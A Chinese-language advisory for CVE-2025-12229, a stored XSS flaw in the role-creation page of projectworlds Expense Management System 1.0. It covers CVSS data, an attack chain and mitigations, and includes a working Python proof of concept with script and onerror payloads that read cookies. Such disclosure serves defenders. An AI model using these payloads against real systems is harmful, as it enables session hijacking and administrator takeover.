CVE-2025-12229 | projectworlds Expense Management System 1.0 角色页面存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12229

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

projectworlds Expense Management System 1.0

漏洞概述

CVE-2025-12229是projectworlds公司开发的Expense Management System（费用管理系统）1.0版本中存在的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞位于管理后台的角色创建功能模块，具体路径为/public/admin/roles/create。攻击者利用该漏洞可以在角色创建页面的特定参数中注入恶意JavaScript代码，当其他管理员或用户访问该角色信息时，恶意脚本将在其浏览器上下文中执行，从而窃取会话Cookie、劫持用户会话、进行钓鱼攻击或修改页面显示内容。由于该漏洞需要高权限用户（PR:H）才能利用，且需要用户交互（UI:R），因此CVSS评分仅为2.4，属于低危漏洞。然而，攻击者一旦成功利用，可能获取管理员权限，对系统安全造成严重影响。该漏洞的利用代码已在互联网上公开，厂商尚未发布官方修复补丁，建议相关用户采取临时防护措施。

技术细节

该漏洞是一个典型的存储型跨站脚本（Stored XSS）漏洞，存在于Expense Management System 1.0的管理后台角色创建功能中。漏洞的根本原因在于应用程序对用户输入的角色名称等参数缺乏充分的输入验证和输出编码。攻击者可以通过以下步骤利用该漏洞：1. 使用管理员账号登录系统后台；2. 访问/public/admin/roles/create路径进入角色创建页面；3. 在角色名称字段中注入恶意JavaScript代码，如：<script>alert(document.cookie)</script>；4. 提交表单将恶意代码存储到数据库；5. 当其他管理员查看角色列表或编辑该角色时，恶意脚本会在其浏览器中执行。由于该漏洞需要高权限用户（PR:H）才能访问角色创建功能，且攻击成功需要诱导其他用户访问包含恶意脚本的页面（UI:R），因此被标记为低危漏洞。但攻击者可以利用此漏洞窃取管理员会话Cookie，进而完全控制整个系统。建议开发者在服务器端对所有用户输入进行严格的输入验证，并使用HTML实体编码等方法对输出进行转义，防止恶意脚本执行。

攻击链分析

STEP 1

信息收集

攻击者通过搜索引擎或漏洞数据库发现CVE-2025-12229漏洞，识别目标系统为projectworlds Expense Management System 1.0，并确定漏洞位置在/public/admin/roles/create路径

STEP 2

权限获取

攻击者通过暴力破解、钓鱼攻击或社工手段获取管理员账号凭据，或利用其他漏洞获取高权限用户会话

STEP 3

漏洞利用

使用管理员账号登录系统，构造包含恶意JavaScript代码的角色名称，如<script>alert(document.cookie)</script>，通过/public/admin/roles/create页面提交，恶意代码被存储到数据库

STEP 4

触发执行

当其他管理员或用户访问角色列表、角色详情页或编辑该角色时，浏览器解析页面内容，恶意脚本在受害者浏览器上下文中执行

STEP 5

会话劫持

恶意脚本窃取受害者的会话Cookie或执行其他恶意操作，攻击者利用窃取的会话信息劫持管理员账户，获取系统完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12229 PoC - Stored XSS in projectworlds Expense Management System 1.0
# Target: /public/admin/roles/create

def exploit_xss(target_url, username, password):
    """
    Exploit Stored XSS vulnerability in Expense Management System 1.0
    
    Parameters:
        target_url: Base URL of the vulnerable application
        username: Admin username
        password: Admin password
    
    Returns:
        bool: True if exploitation successful, False otherwise
    """
    session = requests.Session()
    
    # Step 1: Login to admin panel
    login_url = f"{target_url}/login"
    login_data = {
        'username': username,
        'password': password
    }
    
    try:
        response = session.post(login_url, data=login_data, timeout=10)
        if response.status_code != 200:
            print(f"[-] Login failed with status code: {response.status_code}")
            return False
        
        print("[+] Successfully logged in as admin")
        
        # Step 2: Inject XSS payload in roles/create page
        roles_url = f"{target_url}/public/admin/roles/create"
        
        # XSS payload - can be customized based on target
        xss_payload = "<script>alert('XSS Vulnerability Detected - CVE-2025-12229')</script>"
        
        roles_data = {
            'role_name': xss_payload,
            'description': '<img src=x onerror="alert(document.cookie)">',
            'submit': 'Create'
        }
        
        response = session.post(roles_url, data=roles_data, timeout=10)
        
        if response.status_code == 200:
            print("[+] XSS payload injected successfully")
            print(f"[+] Payload: {xss_payload}")
            print("[+] The malicious script will execute when anyone views the role")
            return True
        else:
            print(f"[-] Injection failed with status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://localhost:8080 admin password123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    print(f"[*] CVE-2025-12229 PoC - Expense Management System XSS")
    print(f"[*] Target: {target}")
    
    exploit_xss(target, user, pwd)

影响范围

projectworlds Expense Management System 1.0

防御指南

临时缓解措施

在官方修复补丁发布之前，建议采取以下临时缓解措施：1）限制管理后台访问权限，仅允许授权IP地址访问；2）启用双因素认证增强管理员账号安全；3）在Web应用防火墙中配置XSS攻击检测规则，拦截包含<script>标签或事件处理器的请求；4）对所有用户输入启用输入验证和过滤；5）启用内容安全策略（CSP）限制脚本执行；6）监控日志及时发现异常访问行为；7）定期备份数据库以便发生安全事件时快速恢复。建议关注厂商官方网站获取最新安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12229
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12229
3 Details https://www.cvedetails.com/cve/CVE-2025-12229/
4 VulDB https://vuldb.com/cve/CVE-2025-12229
5 Link https://github.com/QIU-DIE/CVE/issues/10
6 Link https://vuldb.com/?ctiid.329899
7 Link https://vuldb.com/?id.329899
8 Link https://vuldb.com/?submit.673706